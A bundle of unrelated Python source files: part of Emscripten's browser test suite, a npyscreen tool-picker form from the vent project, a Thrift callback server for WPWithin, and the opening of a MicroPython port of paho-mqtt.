self.compile_btest([test_file('pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji ๐
'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(test_file('pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'EXPORTED_RUNTIME_METHODS=[print]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(test_file('emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(test_file('emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(test_file('emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(test_file('emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest(test_file('emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(test_file('emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(test_file('emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-s', 'ASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(test_file('emscripten_console_log.c'), '0', args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure', '1']]:
self.btest(test_file('small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest_exit(test_file('browser', 'test_offset_converter.c'), assert_returncode=1, args=['-s', 'USE_OFFSET_CONVERTER', '-gsource-map', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(test_file('browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(test_file('system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', test_file('test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', test_file('test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-s', 'MALLOC=emmalloc', '-s', 'ABORTING_MALLOC=0', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'MAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest(test_file('alloc_3gb.cpp'),
expected='0',
args=['-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ALLOW_MEMORY_GROWTH=1'] + args)
test(['-s', 'MALLOC=emmalloc'])
test(['-s', 'MALLOC=emmalloc-debug'])
test(['-s', 'MALLOC=emmalloc-memvalidate'])
test(['-s', 'MALLOC=emmalloc-memvalidate-verbose'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
self.btest(test_file('browser', 'emmalloc_memgrowth.cpp'), expected='0', args=['-s', 'MALLOC=emmalloc', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'ABORTING_MALLOC=0', '-s', 'ASSERTIONS=2', '-s', 'MINIMAL_RUNTIME=1', '-s', 'MAXIMUM_MEMORY=4GB'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. often that occured in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest(test_file('pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser', 'test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
EMRUN = path_from_root('emrun')
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
choose_tools.py
|
import npyscreen
import threading
import time
from vent.api.actions import Action
from vent.api.menu_helpers import MenuHelper
from vent.helpers.meta import Tools
class ChooseToolsForm(npyscreen.ActionForm):
""" For picking which tools to add """
tools_tc = {}
def repo_tools(self, branch):
""" Set the appropriate repo dir and get the tools available of it """
tools = []
m_helper = MenuHelper()
repo = self.parentApp.repo_value['repo']
version = self.parentApp.repo_value['versions'][branch]
status = m_helper.repo_tools(repo, branch, version)
if status[0]:
r_tools = status[1]
for tool in r_tools:
tools.append(tool[0])
return tools
def create(self):
""" Update with current tools for each branch at the version chosen """
self.add_handlers({"^Q": self.quit})
self.add(npyscreen.TitleText,
name='Select which tools to add from each branch selected:',
editable=False)
self.add(npyscreen.Textfield,
value='NOTE tools you have already installed will be ignored',
color='STANDOUT',
editable=False)
i = 6
for branch in self.parentApp.repo_value['versions']:
self.tools_tc[branch] = {}
self.add(npyscreen.TitleText,
name='Branch: ' + branch,
editable=False,
rely=i,
relx=5,
max_width=25)
tools = self.repo_tools(branch)
i += 1
for tool in tools:
value = True
if tool.startswith("/dev"):
value = False
# tool in base directory
if tool == "" or tool.startswith(':'):
tool = "/" + tool
self.tools_tc[branch][tool] = self.add(npyscreen.CheckBox,
name=tool,
value=value,
relx=10)
i += 1
i += 2
def quit(self, *args, **kwargs):
self.parentApp.switchForm("MAIN")
def on_ok(self):
"""
Take the tool selections and add them as plugins
"""
def diff(first, second):
"""
Get the elements that exist in the first list and not in the second
"""
second = set(second)
return [item for item in first if item not in second]
def popup(original_tools, branch, thr, title):
"""
Start the thread and display a popup of the tools being added until
the thread is finished
"""
thr.start()
tool_str = "Adding tools..."
npyscreen.notify_wait(tool_str, title=title)
while thr.is_alive():
tools = diff(Tools(), original_tools)
if tools:
tool_str = ""
for tool in tools:
pre_tool = "Added: " + branch + "/" + tool + "\n"
tool_str = pre_tool + tool_str
npyscreen.notify_wait(tool_str, title=title)
time.sleep(1)
return
original_tools = Tools()
for branch in self.tools_tc:
api_action = Action()
tools = []
for tool in self.tools_tc[branch]:
if self.tools_tc[branch][tool].value:
# get rid of temporary show for multiple tools in same
# directory
if tool == '/':
tools.append(('.', ''))
else:
tools.append((tool, ''))
repo = self.parentApp.repo_value['repo']
version = self.parentApp.repo_value['versions'][branch]
build = self.parentApp.repo_value['build'][branch]
thr = threading.Thread(target=api_action.add, args=(),
kwargs={'repo': repo,
'branch': branch,
'tools': tools,
'version': version,
'build': build})
popup(original_tools, branch, thr,
'Please wait, adding tools for the ' + branch + ' branch...')
npyscreen.notify_confirm("Done adding repository: " +
self.parentApp.repo_value['repo'],
title='Added Repository')
self.quit()
def on_cancel(self):
self.quit()
|
EventServer.py
|
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
import threading
from wpwithin.WPWithinCallback import Client
from wpwithin.WPWithinCallback import Processor
class CallbackHandler:
def __init__(self):
self.log = {}
def beginServiceDelivery(self, serviceId, serviceDeliveryToken, unitsToSupply):
try:
print "event from core - onBeginServiceDelivery()"
print "ServiceID: {0}\n".format(serviceId)
print "UnitsToSupply: {0}\n".format(unitsToSupply)
print "SDT.Key: {0}\n".format(serviceDeliveryToken.key)
print "SDT.Expiry: {0}\n".format(serviceDeliveryToken.expiry)
print "SDT.Issued: {0}\n".format(serviceDeliveryToken.issued)
print "SDT.Signature: {0}\n".format(serviceDeliveryToken.signature)
print "SDT.RefundOnExpiry: {0}\n".format(serviceDeliveryToken.refundOnExpiry)
except Exception as e:
print "doBeginServiceDelivery failed: " + str(e)
def endServiceDelivery(self, serviceId, serviceDeliveryToken, unitsReceived):
try:
print "event from core - onEndServiceDelivery()"
print "ServiceID: {0}\n".format(serviceId)
print "UnitsReceived: {0}\n".format(unitsReceived)
print "SDT.Key: {0}\n".format(serviceDeliveryToken.key)
print "SDT.Expiry: {0}\n".format(serviceDeliveryToken.expiry)
print "SDT.Issued: {0}\n".format(serviceDeliveryToken.issued)
print "SDT.Signature: {0}\n".format(serviceDeliveryToken.signature)
print "SDT.RefundOnExpiry: {0}\n".format(serviceDeliveryToken.refundOnExpiry)
except Exception as e:
print "doEndServiceDelivery failed: " + str(e)
class EventServer:
server = None
def startServer(self, server):
print "##### STARTING WRAPPER SERVER to receive callbacks #####"
print "##### SERVER: " + str(server)
server.serve()
def stop():
if server != None:
server.setShouldStop(True)
def __init__(self, listenerHandler, hostname, port):
try:
if(listenerHandler == None):
print "Using build-in handler"
theListenerToUse = CallbackHandler()
else:
print "Using custom handler"
theListenerToUse = listenerHandler
processor = Processor(theListenerToUse)
transport = TSocket.TServerSocket(host=hostname, port=port)
tfactory = TTransport.TBufferedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
#self.server = TServer.TThreadedServer(processor, transport, tfactory, pfactory)
self.server = TServer.TSimpleServer(processor, transport, tfactory, pfactory)
print "Serving the Wrapper listener, port: " + str(port)
thread = threading.Thread(target=self.startServer, args=([self.server]))
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
print "##### SERVER: " + str(self.server)
print "##### SERVER: SHOULD HAVE STARTED"
print "Should have started Wrapper listener"
except Exception as e:
print "Event server setup failed: " + str(e)
|
upahomqtt.py
|
# This is a stripped down version of paho-mqtt intended for MicroPython.
# https://github.com/ElliottWaterman/upaho-mqtt
import time # utime as time
from time import sleep #, sleep_ms
import threading
from sys import platform as sys_platform, implementation as sys_implementation
import struct # ustruct as struct
import errno
import select
import socket
ssl = None
try:
import ssl
except ImportError:
print("Failed to import ssl")
pass
try:
# Use monotonic clock if available
time_func = time.monotonic
except AttributeError:
time_func = time.time
if sys_platform == 'win32': # or sys_platform == 'linux' or sys_platform == 'darwin':
EAGAIN = errno.WSAEWOULDBLOCK
else: # elif sys_platform == 'GPy'
EAGAIN = errno.EAGAIN
if sys_implementation.name == 'micropython':
DEBUG_PC = False # MicroPython
else:
DEBUG_PC = True # Python
print("DEBUG_PC: " + str(DEBUG_PC))
MQTTv31 = 3
MQTTv311 = 4
PROTOCOL_NAMEv31 = b"MQIsdp"
PROTOCOL_NAMEv311 = b"MQTT"
PROTOCOL_VERSION = 3
# Message types
CONNECT = 0x10
CONNACK = 0x20
PUBLISH = 0x30
PUBACK = 0x40
PUBREC = 0x50
PUBREL = 0x60
PUBCOMP = 0x70
SUBSCRIBE = 0x80
SUBACK = 0x90
UNSUBSCRIBE = 0xA0
UNSUBACK = 0xB0
PINGREQ = 0xC0
PINGRESP = 0xD0
DISCONNECT = 0xE0
# Log levels
MQTT_LOG_INFO = 0x01
MQTT_LOG_NOTICE = 0x02
MQTT_LOG_WARNING = 0x04
MQTT_LOG_ERR = 0x08
MQTT_LOG_DEBUG = 0x10
# CONNACK codes
CONNACK_ACCEPTED = 0
CONNACK_REFUSED_PROTOCOL_VERSION = 1
CONNACK_REFUSED_IDENTIFIER_REJECTED = 2
CONNACK_REFUSED_SERVER_UNAVAILABLE = 3
CONNACK_REFUSED_BAD_USERNAME_PASSWORD = 4
CONNACK_REFUSED_NOT_AUTHORIZED = 5
# Connection state
mqtt_cs_new = 0
mqtt_cs_connected = 1
mqtt_cs_disconnecting = 2
mqtt_cs_connect_async = 3
# Message state
mqtt_ms_invalid = 0
mqtt_ms_publish = 1
mqtt_ms_wait_for_puback = 2
mqtt_ms_wait_for_pubrec = 3
mqtt_ms_resend_pubrel = 4
mqtt_ms_wait_for_pubrel = 5
mqtt_ms_resend_pubcomp = 6
mqtt_ms_wait_for_pubcomp = 7
mqtt_ms_send_pubrec = 8
mqtt_ms_queued = 9
# Error values
MQTT_ERR_AGAIN = -1
MQTT_ERR_SUCCESS = 0
MQTT_ERR_NOMEM = 1
MQTT_ERR_PROTOCOL = 2
MQTT_ERR_INVAL = 3
MQTT_ERR_NO_CONN = 4
MQTT_ERR_CONN_REFUSED = 5
MQTT_ERR_NOT_FOUND = 6
MQTT_ERR_CONN_LOST = 7
MQTT_ERR_TLS = 8
MQTT_ERR_PAYLOAD_SIZE = 9
MQTT_ERR_NOT_SUPPORTED = 10
MQTT_ERR_AUTH = 11
MQTT_ERR_ACL_DENIED = 12
MQTT_ERR_UNKNOWN = 13
MQTT_ERR_ERRNO = 14
sockpair_data = b"0"
class WouldBlockError(Exception):
pass
def error_string(mqtt_errno):
"""Return the error string associated with an mqtt error number."""
if mqtt_errno == MQTT_ERR_SUCCESS:
return "No error."
elif mqtt_errno == MQTT_ERR_NOMEM:
return "Out of memory."
elif mqtt_errno == MQTT_ERR_PROTOCOL:
return "A network protocol error occurred when communicating with the broker."
elif mqtt_errno == MQTT_ERR_INVAL:
return "Invalid function arguments provided."
elif mqtt_errno == MQTT_ERR_NO_CONN:
return "The client is not currently connected."
elif mqtt_errno == MQTT_ERR_CONN_REFUSED:
return "The connection was refused."
elif mqtt_errno == MQTT_ERR_NOT_FOUND:
return "Message not found (internal error)."
elif mqtt_errno == MQTT_ERR_CONN_LOST:
return "The connection was lost."
elif mqtt_errno == MQTT_ERR_TLS:
return "A TLS error occurred."
elif mqtt_errno == MQTT_ERR_PAYLOAD_SIZE:
return "Payload too large."
elif mqtt_errno == MQTT_ERR_NOT_SUPPORTED:
return "This feature is not supported."
elif mqtt_errno == MQTT_ERR_AUTH:
return "Authorisation failed."
elif mqtt_errno == MQTT_ERR_ACL_DENIED:
return "Access denied by ACL."
elif mqtt_errno == MQTT_ERR_UNKNOWN:
return "Unknown error."
elif mqtt_errno == MQTT_ERR_ERRNO:
return "Error defined by errno."
else:
return "Unknown error."
def connack_string(connack_code):
"""Return the string associated with a CONNACK result."""
if connack_code == CONNACK_ACCEPTED:
return "Connection Accepted."
elif connack_code == CONNACK_REFUSED_PROTOCOL_VERSION:
return "Connection Refused: unacceptable protocol version."
elif connack_code == CONNACK_REFUSED_IDENTIFIER_REJECTED:
return "Connection Refused: identifier rejected."
elif connack_code == CONNACK_REFUSED_SERVER_UNAVAILABLE:
return "Connection Refused: broker unavailable."
elif connack_code == CONNACK_REFUSED_BAD_USERNAME_PASSWORD:
return "Connection Refused: bad user name or password."
elif connack_code == CONNACK_REFUSED_NOT_AUTHORIZED:
return "Connection Refused: not authorised."
else:
return "Connection Refused: unknown reason."
def topic_matches_sub(sub, topic):
"""Check whether a topic matches a subscription.
For example:
foo/bar would match the subscription foo/# or +/bar
non/matching would not match the subscription non/+/+
"""
result = True
multilevel_wildcard = False
slen = len(sub)
tlen = len(topic)
if slen > 0 and tlen > 0:
if (sub[0] == '$' and topic[0] != '$') or (topic[0] == '$' and sub[0] != '$'):
return False
spos = 0
tpos = 0
while spos < slen and tpos < tlen:
if sub[spos] == topic[tpos]:
if tpos == tlen-1:
# Check for e.g. foo matching foo/#
if spos == slen-3 and sub[spos+1] == '/' and sub[spos+2] == '#':
result = True
multilevel_wildcard = True
break
spos += 1
tpos += 1
if tpos == tlen and spos == slen-1 and sub[spos] == '+':
spos += 1
result = True
break
else:
if sub[spos] == '+':
spos += 1
while tpos < tlen and topic[tpos] != '/':
tpos += 1
if tpos == tlen and spos == slen:
result = True
break
elif sub[spos] == '#':
multilevel_wildcard = True
if spos+1 != slen:
result = False
break
else:
result = True
break
else:
result = False
break
if not multilevel_wildcard and (tpos < tlen or spos < slen):
result = False
return result
class MQTTMessage(object):
""" This is a class that describes an incoming message. It is passed to the
on_message callback as the message parameter.
"""
def __init__(self, mid=0, topic=b""):
self.timestamp = 0
self.state = mqtt_ms_invalid
self.dup = False
self.mid = mid
self._topic = topic
self.payload = b""
self.qos = 0
self.retain = False
def __eq__(self, other):
"""Override the default Equals behavior"""
if isinstance(other, self.__class__):
return self.mid == other.mid
return False
def __ne__(self, other):
"""Define a non-equality test"""
return not self.__eq__(other)
@property
def topic(self):
return self._topic # Returns bytes # .decode('utf-8') = str
@topic.setter
def topic(self, value):
